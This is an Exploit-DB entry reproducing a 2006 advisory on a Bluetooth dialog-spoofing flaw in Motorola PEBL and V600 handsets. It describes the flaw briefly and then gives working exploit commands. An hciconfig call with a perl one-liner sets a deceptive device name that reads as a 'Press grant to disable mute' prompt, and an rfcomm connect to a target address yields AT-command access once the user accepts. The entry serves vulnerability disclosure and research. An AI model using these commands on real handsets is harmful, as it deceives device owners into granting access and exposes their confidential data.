Motorola - BlueTooth Interface Dialog Spoofing

EDB-ID:

27454


Author:

kspecial

Type:

webapps


Platform:

PHP

Date:

2006-03-22


source: https://www.securityfocus.com/bid/17190/info

Motorola mobile handsets are prone to a dialog-spoofing vulnerability when accepting Bluetooth communications. An attacker could exploit this issue to trick a user into granting them AT access to the device. The attacker could then gather confidential information from the handset.

Motorola PEBL and V600 handsets are vulnerable to this issue; other devices may also be affected.

# hciconfig hci0 name `perl -e 'print "Press\x0dgrant\x0dto\x0ddisable\x0dmute\x0d\x0d"'` 
# rfcomm connect 0 00:15:A8:74:87:3E 3 (wait for user to press grant)
Connected /dev/rfcomm0 to 00:15:A8:74:87:3E on channel 3
Press CTRL-C for hangup